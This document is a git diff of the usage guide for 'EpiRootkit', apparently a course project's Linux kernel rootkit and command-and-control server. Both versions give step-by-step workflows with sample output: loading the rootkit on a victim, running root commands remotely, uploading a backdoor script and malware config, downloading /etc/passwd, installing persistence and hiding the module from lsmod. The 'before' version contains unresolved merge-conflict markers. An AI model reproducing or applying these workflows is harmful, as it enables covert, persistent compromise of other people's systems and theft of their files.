content/docs/03-attacking-program/usage.md, before:

---
title: "Usage Guide"
description: "Comprehensive usage scenarios and workflows"
icon: "menu_book"
date: "2025-05-25T00:00:00+01:00"
lastmod: "2025-05-25T16:00:00+01:00"
draft: false
toc: true
weight: 304
---

<<<<<<< HEAD
## Running the Server & Web UI
=======
# Usage Guide
>>>>>>> d8205ef9e1984d8455d84e1cada77692ef2857c0

Complete workflows and usage scenarios for the EpiRootkit C2 server.

## Getting Started

### 1. Start the C2 Server
```bash
<<<<<<< HEAD
pnpm start
```

This command starts both the C2 server and the Web UI. The CLI prompt (`c2-server$ `) will appear for server management, and the Web UI will be available at [http://localhost:3000](http://localhost:3000) by default.

Real-time event logs appear in the console, providing visual alerts for significant events such as client connections and disconnections.
=======
cd attacking_program
pnpm start
```

### 2. Wait for Rootkit Connection
```bash
# On victim machine
sudo insmod epirootkit.ko
>>>>>>> d8205ef9e1984d8455d84e1cada77692ef2857c0

# C2 server will show:
┌─ Client-1
  ✓ [2025-05-25 16:13:29] Connected
└─
```

### 3. Authenticate
```bash
c2-server$ auth Client-1 <password> (default: password)
┌─ Client-1
  ✓ [2025-05-25 16:13:30] Authenticated
└─
```

#### Brute Force Protection

Rate limit to 5 attempts per 60 seconds.

## Basic Workflows

### Client Management Workflow

#### List and Monitor Clients
```bash
# List all connected clients
c2-server$ ls
┌─ Connected Clients
  • Client-1 - AUTHENTICATED - Last seen: 6:13:29 PM
  • Client-2 - UNAUTHENTICATED - Last seen: 6:10:15 PM
└─

# Check specific client status
c2-server$ status Client-1
┌─ Client-1
  • [2025-05-25 16:13:30] Command result:
  • EpiRootkit Status:
  • Version: 1.0.0
  • Authentication: YES
  • Connection: CONNECTED
  • Module Hidden: YES
  • Encryption: DISABLED
  • Persistence: ENABLED
└─

# Monitor connection health
c2-server$ keepalive Client-1
┌─ Client-1
  • [2025-05-25 16:13:31] Command result:
  • Keepalive Status:
  • Last ping sent: 2025-05-25 16:14:00
  • Connection stable: YES
└─
```

### Command Execution Workflow

#### Basic System Commands
```bash
# Check user privileges
c2-server$ exec Client-1 whoami
┌─ Client-1
  • [2025-05-25 16:13:32] Command result:
  • root
└─

# System information
c2-server$ exec Client-1 uname -a
┌─ Client-1
  • [2025-05-25 16:13:33] Command result:
  • Linux victim 5.4.0-74-generic #83-Ubuntu SMP Wed Apr 29 23:25:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
└─

```


### File Transfer Workflow

#### Upload Files to Victim
```bash
# Upload a script
c2-server$ upload Client-1 ./scripts/backdoor.sh /tmp/backdoor.sh
┌─ File Upload
  • Uploading ./scripts/backdoor.sh → /tmp/backdoor.sh
  ✓ Upload initiated
└─

# Upload configuration
c2-server$ upload Client-1 ./configs/malware.conf /etc/malware.conf
┌─ File Upload
  • Uploading ./configs/malware.conf → /etc/malware.conf
  ✓ Upload initiated
└─

# Verify upload
c2-server$ exec Client-1 ls -la /tmp/backdoor.sh
c2-server$ exec Client-1 chmod +x /tmp/backdoor.sh
```

#### Download Files from Victim
```bash
# Download sensitive files
c2-server$ download Client-1 /etc/passwd ./victim_passwd
┌─ File Download
  • Downloading /etc/passwd → ./victim_passwd
  ✓ Download request sent
└─
```

## Advanced Workflows

### Persistence Management

#### Install Persistence
```bash
# Interactive persistence menu
c2-server$ persist Client-1
┌─ Persistence Management - Client-1
  • Install All Methods
  • Remove All Methods
  • Install Specific Method
  • Show Status
  • Exit

? Select persistence action: Install All Methods
┌─ Installing Persistence
  • Installing all persistence mechanisms on Client-1...
  ✓ all persistence mechanisms installation command sent
└─

# Install specific method
c2-server$ persist Client-1 install modules
┌─ Installing Persistence
  • Installing modules-load.d persistence on Client-1...
  ✓ modules-load.d persistence installation command sent
└─
```


### Stealth Configuration

#### Interactive Configuration
```bash
c2-server$ config Client-1
┌─ Configuration - Client-1
  • Fetching current status...

  Current Configuration:
  [X] Module Hiding (Click to disable)
  [ ] Persistence (Click to enable)
  Refresh Status
  Exit

? Select option: [X] Module Hiding (Click to disable)
┌─ Configuration - Client-1
  • Applying configuration change...
  ✓ Configuration updated
└─
```

#### Manual Stealth Commands
```bash
# Hide module from lsmod
c2-server$ exec Client-1 lsmod | grep epirootkit
# (should show module)

# Enable hiding
c2-server$ status Client-1
# Check if "Module Hidden: YES"

# Verify hiding
c2-server$ exec Client-1 lsmod | grep epirootkit
# (should show no output if hidden)
```

Commit message:

Refactor installation and usage documentation for EpiRootkit C2 server. Removed outdated prerequisites and installation steps, clarified server startup instructions, and enhanced web UI access details. Updated authentication panel description to reflect two-layer security features. Deleted obsolete web UI installation file.

content/docs/03-attacking-program/usage.md, after:

---
title: "Usage Guide"
description: "Comprehensive usage scenarios and workflows"
icon: "menu_book"
date: "2025-05-25T00:00:00+01:00"
lastmod: "2025-05-25T16:00:00+01:00"
draft: false
toc: true
weight: 304
---

# Usage Guide

Complete workflows and usage scenarios for the EpiRootkit C2 server.

## Getting Started

### 1. Start the C2 Server
```bash
cd attacking_program
pnpm start
```

This command starts both the C2 server and the Web UI. The CLI prompt (`c2-server$ `) will appear for server management, and the Web UI will be available at [http://localhost:3000](http://localhost:3000) by default.

Real-time event logs appear in the console, providing visual alerts for significant events such as client connections and disconnections.

### 2. Wait for Rootkit Connection
```bash
# On victim machine
sudo insmod epirootkit.ko

# C2 server will show:
┌─ Client-1
  ✓ [2025-05-25 16:13:29] Connected
└─
```

### 3. Authenticate
```bash
c2-server$ auth Client-1 <password> (default: password)
┌─ Client-1
  ✓ [2025-05-25 16:13:30] Authenticated
└─
```

#### Brute Force Protection

Rate limit to 5 attempts per 60 seconds.

## Basic Workflows

### Client Management Workflow

#### List and Monitor Clients
```bash
# List all connected clients
c2-server$ ls
┌─ Connected Clients
  • Client-1 - AUTHENTICATED - Last seen: 6:13:29 PM
  • Client-2 - UNAUTHENTICATED - Last seen: 6:10:15 PM
└─

# Check specific client status
c2-server$ status Client-1
┌─ Client-1
  • [2025-05-25 16:13:30] Command result:
  • EpiRootkit Status:
  • Version: 1.0.0
  • Authentication: YES
  • Connection: CONNECTED
  • Module Hidden: YES
  • Encryption: DISABLED
  • Persistence: ENABLED
└─

# Monitor connection health
c2-server$ keepalive Client-1
┌─ Client-1
  • [2025-05-25 16:13:31] Command result:
  • Keepalive Status:
  • Last ping sent: 2025-05-25 16:14:00
  • Connection stable: YES
└─
```

### Command Execution Workflow

#### Basic System Commands
```bash
# Check user privileges
c2-server$ exec Client-1 whoami
┌─ Client-1
  • [2025-05-25 16:13:32] Command result:
  • root
└─

# System information
c2-server$ exec Client-1 uname -a
┌─ Client-1
  • [2025-05-25 16:13:33] Command result:
  • Linux victim 5.4.0-74-generic #83-Ubuntu SMP Wed Apr 29 23:25:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
└─
```

### File Transfer Workflow

#### Upload Files to Victim
```bash
# Upload a script
c2-server$ upload Client-1 ./scripts/backdoor.sh /tmp/backdoor.sh
┌─ File Upload
  • Uploading ./scripts/backdoor.sh → /tmp/backdoor.sh
  ✓ Upload initiated
└─

# Upload configuration
c2-server$ upload Client-1 ./configs/malware.conf /etc/malware.conf
┌─ File Upload
  • Uploading ./configs/malware.conf → /etc/malware.conf
  ✓ Upload initiated
└─

# Verify upload
c2-server$ exec Client-1 ls -la /tmp/backdoor.sh
c2-server$ exec Client-1 chmod +x /tmp/backdoor.sh
```

#### Download Files from Victim
```bash
# Download sensitive files
c2-server$ download Client-1 /etc/passwd ./victim_passwd
┌─ File Download
  • Downloading /etc/passwd → ./victim_passwd
  ✓ Download request sent
└─
```

## Advanced Workflows

### Persistence Management

#### Install Persistence
```bash
# Interactive persistence menu
c2-server$ persist Client-1
┌─ Persistence Management - Client-1
  • Install All Methods
  • Remove All Methods
  • Install Specific Method
  • Show Status
  • Exit

? Select persistence action: Install All Methods
┌─ Installing Persistence
  • Installing all persistence mechanisms on Client-1...
  ✓ all persistence mechanisms installation command sent
└─

# Install specific method
c2-server$ persist Client-1 install modules
┌─ Installing Persistence
  • Installing modules-load.d persistence on Client-1...
  ✓ modules-load.d persistence installation command sent
└─
```

### Stealth Configuration

#### Interactive Configuration
```bash
c2-server$ config Client-1
┌─ Configuration - Client-1
  • Fetching current status...

  Current Configuration:
  [X] Module Hiding (Click to disable)
  [ ] Persistence (Click to enable)
  Refresh Status
  Exit

? Select option: [X] Module Hiding (Click to disable)
┌─ Configuration - Client-1
  • Applying configuration change...
  ✓ Configuration updated
└─
```

#### Manual Stealth Commands
```bash
# Hide module from lsmod
c2-server$ exec Client-1 lsmod | grep epirootkit
# (should show module)

# Enable hiding
c2-server$ status Client-1
# Check if "Module Hidden: YES"

# Verify hiding
c2-server$ exec Client-1 lsmod | grep epirootkit
# (should show no output if hidden)
```

## Web UI Usage

### Access Web Interface
1. Open browser to `http://localhost:3000`
2. Login with the configured password
3. View connected clients in real-time
4. Execute commands through the web interface
5. Monitor client status and logs

### Key Features
- **Real-time Updates**: Client status updates automatically
- **Command History**: View previous commands and results
- **File Operations**: Upload/download files through web interface
- **Authentication Management**: Handle client authentication securely
